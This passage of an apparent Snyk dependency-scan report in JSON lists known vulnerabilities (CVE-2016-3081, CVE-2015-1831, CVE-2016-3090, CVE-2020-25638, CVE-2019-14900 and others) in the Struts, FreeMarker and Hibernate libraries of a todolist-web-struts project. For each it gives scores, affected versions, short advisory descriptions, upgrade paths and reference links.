Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-20T07:45:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.243501Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "title": "Command Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.20.2)", + "[2.3.24, 2.3.24.2)", + "[2.3.28, 2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.554699Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", + "epssDetails": { + "percentile": "0.99987", + "probability": "0.97524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3081" + ], + "CWE": [ + "CWE-77" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2019-07-16T11:38:49.236917Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T04:32:51Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-04-22T04:32:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:20.892839Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3", + "org.apache.struts.xwork:xwork-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", + "title": "Insecure Defaults", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "Jasper Rosenberg" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.20.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.20.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/WW-4486", + "title": "Jira Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831", + "title": "NVD" + }, + { + "url": "https://struts.apache.org/docs/s2-024.html", + "title": "Struts Security Advisory" + }, + { + "url": "http://struts.apache.org/docs/s2-024.html", + "title": "Vulnerability Summary" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:26.053752Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.093877Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:26.053752Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Insecure Defaults. The default exclude patterns (excludeParams) allow remote attackers to \"compromise internal state of an application\" via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/5ebc0643b55d728a6713a82559a594d875452cd8)\n- [GitHub Commit](https://github.com/apache/struts/commit/d832747d647df343ed07a58b1b5e540a05a4d51b)\n- [Jira Issue](https://issues.apache.org/jira/browse/WW-4486)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1831)\n- [Struts Security Advisory](https://struts.apache.org/docs/s2-024.html)\n- [Vulnerability Summary](http://struts.apache.org/docs/s2-024.html)\n", + "epssDetails": { + "percentile": "0.85294", + "probability": "0.01190", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-1831" + ], + "CWE": [ + "CWE-453" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2019-10-27T13:46:24.359760Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-05-11T16:51:55Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2015-05-11T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:26.053752Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.1", + "org.apache.struts.xwork:xwork-core@2.3.20.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Huawei PSIRT" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf", + "title": "GitHub Commit" + }, + { + "url": "https://struts.apache.org/docs/s2-027.html", + "title": "Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:51.429176Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:53.537810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.429176Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation such that the `TextParseUtil.translateVariables` method allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.\r\n\r\n**Note:**\r\n\r\nThe Struts 2 framework does not pass any user-modifiable input to this method, neither directly nor indirectly. However, a developer crafting a Struts based web application might pass unsanitized user input to `TextParseUtil.translateVariables` or ActionSupport's `getText` methods. In that case a RCE exploitation might be possible.\r\n\r\n## Workaround\r\n\r\nUsers who are unable to upgrade to the fixed version should not pass unsanitized user input to framework methods that include OGNL expression evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.24.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf)\n- [Issue](https://struts.apache.org/docs/s2-027.html)\n", + "epssDetails": { + "percentile": "0.86301", + "probability": "0.01352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3090" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-ggmp-fxfg-277r" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2023-08-01T07:46:40.919855Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-14T03:15:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2023-08-01T09:22:02.765398Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.429176Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1", + "org.apache.struts.xwork:xwork-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGFREEMARKER-1076795", + "title": "Server-side Template Injection (SSTI)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Ackcent" + ], + "semver": { + "vulnerable": [ + "[,2.3.30)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.30" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.freemarker:freemarker", + "references": [ + { + "url": "https://github.com/apache/freemarker/pull/62", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/FREEMARKER-124", + "title": "Jira Issue" + }, + { + "url": "https://ackcent.com/in-depth-freemarker-template-injection/", + "title": "Research Blogpost" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:29.670906Z" + } + ], + "description": "## Overview\n[org.freemarker:freemarker](https://github.com/apache/freemarker) is a \"template engine\"; a generic tool to generate text output (anything from HTML to auto generated source code) based on templates.\n\nAffected versions of this package are vulnerable to Server-side Template Injection (SSTI). By allowing user input into `java.security.ProtectionDomain.getClassLoader`, templates will get access to the java classloader. This can be further leveraged for file system access and code execution. A low-privileged user is sufficient for exploitation of this vulnerability.\n## Remediation\nUpgrade `org.freemarker:freemarker` to version 2.3.30 or higher.\n## References\n- [GitHub PR](https://github.com/apache/freemarker/pull/62)\n- [Jira Issue](https://issues.apache.org/jira/browse/FREEMARKER-124)\n- [Research Blogpost](https://ackcent.com/in-depth-freemarker-template-injection/)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.freemarker:freemarker", + "proprietary": false, + "creationTime": "2021-02-19T11:41:17.941362Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-09T11:33:30Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.freemarker", + "artifactId": "freemarker" + }, + "publicationTime": "2021-02-19T15:54:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T14:04:29.670906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.freemarker:freemarker@2.3.19" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.25", + "org.freemarker:freemarker@2.3.30" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.freemarker:freemarker", + "version": "2.3.19" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": 